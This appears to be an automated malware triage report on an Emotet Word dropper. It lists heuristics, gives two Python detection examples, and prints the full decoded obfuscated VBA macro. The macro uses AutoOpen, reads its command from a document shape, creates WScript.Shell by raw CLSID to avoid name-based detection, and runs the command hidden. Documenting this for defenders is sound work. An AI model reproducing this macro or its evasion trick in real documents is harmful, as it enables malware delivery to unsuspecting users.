Verdict: MALICIOUS
Risk Score: 252
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing VBA macros. An AutoOpen macro instantiates the WScript.Shell COM object by its raw CLSID, GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8"), rather than through the CreateObject("WScript.Shell") ProgID that name-based detection keys on; it reads its command line from the text frame of a shape in the document body (Shapes("GzmPjnLztYzSzd").TextFrame.TextRange.Text) instead of storing it in the macro, and passes it to WshShell.Run with window style 0 (hidden window). The PowerShell reference found in the sample is consistent with that command being a PowerShell stager that downloads and executes a second-stage payload. ClamAV identifies the file as Emotet, a known downloader family.
Heuristics (9)

- ClamAV: Doc.Downloader.Emotet-6826434-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Downloader.Emotet-6826434-0.
- VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
  Document contains VBA macro code.
  - VBA instantiates a dangerous COM class by CLSID [critical] OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. In this sample the CLSID 72C24DD5-D70A-438B-8A42-98424B88AFB8 is WScript.Shell; note that the macro writes it without braces and pads the string with undefined (and therefore empty) variables, so a rule that expects the braced form or a clean closing quote will miss it.
    Matched line in script, with the surrounding context lines:
        End Select
        Set wfArzbE = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + LZvlFiO + LwPWXZ + mTvTcDpC + XOhsCfQm))
        On Error Resume Next
  - GetObject call [high] OLE_VBA_GETOBJ
    Fires on the same GetObject line as the finding above.
  - AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script, with the surrounding context lines:
        Attribute VB_Customizable = True
        Sub AutoOpen()
        On Error Resume Next
- Reference to PowerShell [high] SC_STR_POWERSHELL
  A PowerShell reference was found in the sample. No matched line is reported, and the extracted macro source does not contain the string, so the reference sits elsewhere in the document; this is consistent with the command line being held in the shape text that the macro reads at run time rather than in the macro itself.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's generic description states that no modern VBA project was recovered and no stronger macro-virus family marker was present, and that it is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample that wording does not apply: a VBA project was recovered (macros.bas, below), so the marker duplicates the AutoOpen finding above and adds no independent evidence.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. Here this is the decoded macro source (macros.bas, below), flagged for name-mangled identifiers.
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached it.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML XML namespace URI that Office writes into drawing markup; it is not a network indicator and should not be treated as a download or C2 URL.
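To make the OLE_VBA_GETOBJECT_CLSID_DANGEROUS finding above concrete, here is an added Python example (not the analyzer's code and not part of oletools) that scans VBA source for GetObject("new:...") with a raw CLSID, with or without braces and regardless of what follows the literal, resolves it against a small CLSID-to-ProgID table, and contrasts it with a rule that only looks for the literal string WScript.Shell. The table is this example's own assumption, limited to CLSIDs the editor is certain of; the WScript.Shell entry is the one this sample uses. The sample input is constructed from the matched line in the report plus two contrasting lines.

```python
"""Detect COM instantiation by raw CLSID in extracted VBA source.

Added example, not part of this analyzer's report or of oletools. The
CLSID-to-ProgID table is this example's own assumption; the first entry is
the CLSID used by the macro in this report.
"""
import re
from dataclasses import dataclass

# Execution-capable COM classes commonly abused from macros (assumed table).
KNOWN_CLSIDS = {
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell",
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Shell",  # second registration of the same class
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
    "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject",
}

# GetObject("new:{CLSID}") or GetObject("new:CLSID"): braces optional, case-insensitive.
# The literal may be followed by `" + var` concatenation (as in this sample), so the
# pattern stops after the CLSID instead of requiring a closing quote.
CLSID_MONIKER = re.compile(
    r'GetObject\s*\(\s*"new:\s*\{?'
    r'([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}?',
    re.IGNORECASE,
)
# The conventional name-based form that simple ProgID string rules key on.
PROGID_CREATE = re.compile(r'CreateObject\s*\(\s*"([A-Za-z0-9_.]+)"', re.IGNORECASE)


@dataclass
class Hit:
    line_no: int
    via: str         # "clsid" or "progid"
    identifier: str  # normalized (upper-case) CLSID, or the ProgID as written
    progid: str      # resolved ProgID, or "<unknown CLSID>"
    line: str


def scan_vba(source: str) -> list:
    """Return one Hit per COM instantiation found, by CLSID moniker or by ProgID."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        for m in CLSID_MONIKER.finditer(line):
            clsid = m.group(1).upper()
            hits.append(Hit(n, "clsid", clsid,
                            KNOWN_CLSIDS.get(clsid, "<unknown CLSID>"), line.strip()))
        for m in PROGID_CREATE.finditer(line):
            hits.append(Hit(n, "progid", m.group(1), m.group(1), line.strip()))
    return hits


def progid_only_scan(source: str) -> list:
    """Line numbers a rule that only matches the literal 'WScript.Shell' would report."""
    return [n for n, l in enumerate(source.splitlines(), 1) if "wscript.shell" in l.lower()]


# Constructed sample: the matched line from this report's macro, the conventional
# CreateObject form, and a braced lower-case CLSID for comparison.
SAMPLE = '''Set wfArzbE = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + LZvlFiO + LwPWXZ + mTvTcDpC + XOhsCfQm))
Set sh = CreateObject("WScript.Shell")
Set fso = GetObject("new:{0d43fe01-f093-11cf-8940-00a0c9054228}")
'''

if __name__ == "__main__":
    for h in scan_vba(SAMPLE):
        print(f"line {h.line_no}: {h.via:6} {h.identifier} -> {h.progid}")
    print("ProgID-string rule matched lines:", progid_only_scan(SAMPLE))
```

Run against the constructed sample, the CLSID scanner resolves line 1 to WScript.Shell while the ProgID-string rule reports only line 2, which is exactly the gap the macro exploits.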
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4994 bytes |

SHA-256: 3aecc998474c0efede0c6ada349c495f27df973fd912edc80ace101176923792
Detection: ClamAV: No threats found (the Emotet signature above fired on the parent document, not on the decoded macro source).
Obfuscation or payload: likely. 118 of 177 identifiers look randomly generated (e.g. 'GzmPjnLztYzSzd'), consistent with name-mangling obfuscation.
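The "118 of 177 identifiers look randomly generated" figure comes from the analyzer's own scoring, which the report does not show. As an added example (not the analyzer's code), the Python below implements one plausible version of that heuristic: distinct identifiers outside string literals are scored on vowel density, longest consonant run and erratic lower-to-upper case flips. The thresholds and the keyword/object-model skip list are this example's assumptions, and string literal contents (including the shape name 'GzmPjnLztYzSzd') are deliberately excluded from the count, so its totals are not comparable to the report's. The sample is a constructed excerpt of the macro preview below plus two lines with human-chosen names for contrast.

```python
"""Score VBA identifiers for name-mangling obfuscation.

Added example, not the analyzer's own code. Thresholds and the skip list are
assumptions tuned to separate mangled CamelCase-like names from ordinary
English-derived ones; they are not calibrated against any corpus.
"""
import re

# VBA keywords, conversion functions and Word object-model names that are
# not attacker-chosen identifiers (assumed skip list).
SKIP = {
    "attribute", "sub", "end", "on", "error", "resume", "next", "select", "case",
    "set", "const", "true", "false", "dim", "as", "function", "if", "then", "else",
    "cbool", "clng", "cvar", "atn", "getobject", "createobject", "environ",
    "shapes", "textframe", "textrange", "text", "run",
}
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
STRING_LIT = re.compile(r'"[^"]*"')
VOWELS = set("aeiouAEIOU")


def looks_random(name: str) -> bool:
    """Pronounceability heuristic over the letters of one identifier."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 5:
        return False  # too short to judge either way
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    run = longest = 0  # longest run of consecutive consonants
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    # lower->upper flips after the first letter; CamelCase words have about one per word
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.islower() and b.isupper())
    return vowel_ratio < 0.25 or longest >= 4 or (flips >= 2 and vowel_ratio < 0.35)


def identifier_stats(source: str) -> dict:
    """Distinct identifiers outside string literals, with the mangled subset."""
    names = set()
    for line in source.splitlines():
        line = STRING_LIT.sub('""', line)  # drop CLSIDs, shape names, etc. inside quotes
        for m in IDENT.finditer(line):
            tok = m.group(0)
            if tok.lower() in SKIP or tok.startswith("VB_"):
                continue
            names.add(tok)
    flagged = sorted(n for n in names if looks_random(n))
    return {
        "total": len(names),
        "random": len(flagged),
        "flagged": flagged,
        "ratio": len(flagged) / len(names) if names else 0.0,
    }


# Constructed sample: lines taken from this report's macro preview, plus two
# lines with ordinary human-chosen names for contrast.
SAMPLE = '''Sub AutoOpen()
Set WnhZotr = Shapes("GzmPjnLztYzSzd")
MZrkIZw = "" + IIYjDGY + dUXHBpua + WnhZotr.TextFrame.TextRange.Text
Set wfArzbE = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + LZvlFiO))
wfArzbE.Run MZrkIZw, FpQoohXLD
Set shellObj = CreateObject("WScript.Shell")
downloadPath = Environ("TEMP")
'''

if __name__ == "__main__":
    stats = identifier_stats(SAMPLE)
    print(f"{stats['random']} of {stats['total']} identifiers look randomly generated")
    print("flagged:", ", ".join(stats["flagged"]))
```

On the constructed excerpt the seven mangled names are flagged and the three human-chosen ones (AutoOpen, shellObj, downloadPath) are not; on real samples the ratio, not any single name, is the signal, since short or vowel-rich mangled names slip through and legitimate code occasionally uses acronyms that trip the consonant-run check.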
Preview script (first 1,000 lines of the extracted script). Most of the body is filler: Select Case blocks over undefined variables whose Case values can never match, kept from raising errors by the repeated On Error Resume Next. The lines that do the work are Set WnhZotr = Shapes("GzmPjnLztYzSzd"), which fetches a shape from the document body; the MZrkIZw = ... concatenation, which builds the command line from WnhZotr.TextFrame.TextRange.Text (the other operands are undefined variables and contribute empty strings); Set wfArzbE = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + ...)), which instantiates WScript.Shell by CLSID (the trailing concatenated variables are likewise empty); Const FpQoohXLD = 0; and wfArzbE.Run MZrkIZw, FpQoohXLD, which executes the command with window style 0 (hidden window).
Attribute VB_Name = "zTSBzVmTO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case LDKYGYMA
Case 15210334
AnrMi = CBool(jKzBhiof)
QKvOsl = 31001642
TKiJo = CBool(YXDjH)
Case 169345724
TomzwAdDB = CBool(OiIqOQlK)
vlYCAW = Atn(AbiiujFUw)
JPtkazS = CBool(QijTKHR)
odKvmmc = Atn(41897478 * CLng(340075060))
End Select
On Error Resume Next
Select Case qlCTXJ
Case 209767118
iHwJjtVz = CBool(MQzCLU)
zpQmZCHN = 220745380
NaOiwB = CBool(VQdNAIG)
Case 259333864
EUiwO = CBool(QRVistQj)
icXfvicPO = Atn(jvrYwjJ)
WwmjjziJz = CBool(OJcFji)
YkbrUbF = Atn(103972817 * CLng(149668441))
End Select
Set WnhZotr = Shapes("GzmPjnLztYzSzd")
On Error Resume Next
Select Case zisHkjdz
Case 322607801
KjBmUI = CBool(XRLnSnLXV)
tTlUm = 147074321
INhMPMjHL = CBool(fdAzZ)
Case 63086442
fsIAiqhj = CBool(jkiLvX)
HiGalI = Atn(ijHif)
UFTJwptOs = CBool(XAczjvc)
KHPsS = Atn(127825759 * CLng(227744357))
End Select
MZrkIZw = "" + IIYjDGY + dUXHBpua + OFizOB + cnzbsSG + WnhZotr.TextFrame.TextRange.Text + GPwnFG + lEdQd + HvNOuQQ
On Error Resume Next
Select Case KwpUvPi
Case 313941215
PBaZhj = CBool(iEmGrPw)
iFCpMLAzn = 148155252
uBnuQmhUD = CBool(npjYfE)
Case 113355953
ZiuzzlpN = CBool(jHPEnCnlV)
KWTKvvivP = Atn(QjGjRN)
zzBBEDtw = CBool(oHzmvn)
JGJGY = Atn(339431101 * CLng(17593061))
End Select
On Error Resume Next
Select Case LRwwvwWA
Case 203938198
DdRzn = CBool(oibJKQUwC)
FPiihcS = 185617685
iwiPh = CBool(PQJFqJYU)
Case 29853341
hYhUv = CBool(zvarGWwVa)
puFvGS = Atn(VvzLsMLju)
hzDlHIl = CBool(mpqjt)
nifTdP = Atn(58212323 * CLng(306903405))
End Select
Set wfArzbE = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + LZvlFiO + LwPWXZ + mTvTcDpC + XOhsCfQm))
On Error Resume Next
Select Case wXGPp
Case 22351217
hJCHFWAiT = CBool(CfjDWBBWT)
purRrb = 217827953
brSPZ = CBool(uowUfmRj)
Case 91639473
UXwAaWF = CBool(VmBnRlQip)
DcimFuIiD = Atn(qhzIjPzT)
jjFmZun = CBool(HWNDBwXd)
zhRCrsTX = Atn(18736161 * CLng(266015260))
End Select
On Error Resume Next
Select Case kDLzwD
Case 72791386
mECFXoRcj = CBool(FlTcN)
kECQoH = 230082505
PzwbQlC = CBool(pZjvMvAfo)
Case 332519350
zVVrHpz = CBool(sAuKiV)
pZspLuF = Atn(wtvSz)
DWcpijEu = CBool(olQWJ)
vPCZkFbnw = Atn(254451854 * CLng(202046398))
End Select
On Error Resume Next
Select Case dvGmMK
Case 49722810
vrGzzXTS = CBool(mrMvnRs)
jZKbpibbw = 156580783
mGBYUziL = CBool(srwpJjiEI)
Case 145631201
dOqflwHGN = CBool(WDzkjYk)
rvFGvE = Atn(bVRFAWTZ)
FYPWmYrc = CBool(RVowEdLtl)
akXTmq = Atn(66273601 * CLng(175771278))
End Select
On Error Resume Next
Select Case MKkYuW
Case 135113000
MbjmSMz = CBool(QWmzSAAZZ)
hwHIV = 54521677
nirjB = CBool(fSjSTJ)
Case 19317625
irpNWbGt = CBool(KLwqoW)
DFakfi = Atn(HPJHi)
hjQWWzGR = CBool(zjvtVjYCW)
wQOOiSBEj = Atn(223702445 * CLng(331503309))
End Select
Const FpQoohXLD = 0
On Error Resume Next
Select Case PvHwlaC
Case 297762154
MMNWzutSM = CBool(jUCSZG)
kQCEMJtb = 36379625
OkKMKarip = CBool(ECGmvt)
Case 266257311
INdir = CBool(pmrmz)
Uvtvi = Atn(BHWtLojr)
iKPISVlT = CBool(WjtJXYjEi)
vJJKIOsh = Atn(247638498 * CLng(95058472))
End Select
wfArzbE.Run MZrkIZw, FpQoohXLD
On Error Resume Next
Select Case NPtzzkT
Case 147055854
kLnUVjJ = CBool(mLSSXMhR)
kLCaOPB = 279841414
cvPnfSzC = CBool(tzRhbJX)
Case 9421521
qGqCLhXz = CBool(TuVvm)
nGNSzfz = Atn(VloSKD)
sDNbLjra = CBool(hPjKfHFz)
nuUvEC = Atn(56429717 * CLng(278369354))
End Select
On Error Resume Next
Select Case BGljK
Case 271389305
JitzAGwY = CBool(SSjPDiw)
MTiKafir = 65596981
tQXiIN = CBool(caWAiiuaR)
Case 334345398
muzTH = CBool(UqKci)
OFqmEHAnK = Atn(RaHchi)
kjJjiFPW = CBool(ISKSCUt)
IunspTQ = Atn(73263370 * CLng(275055725))
End Select
On Error Resume Next
Select Case AznEviB
Case 28315525
idVjFsiXL = CBool(PvBTBCjMq)
pQNvTarM = 2848141
CjothSmqr = CBool(iKwtvf)
Case 333266987
lCPSLVG = CBool(QZQfBV)
RpiGIlj = Atn(pVbEfU)
AobNaw = CBool(kVTmQCN)
LMInfEN = Atn(159319551 * CLng(276082480))
End Select
End Sub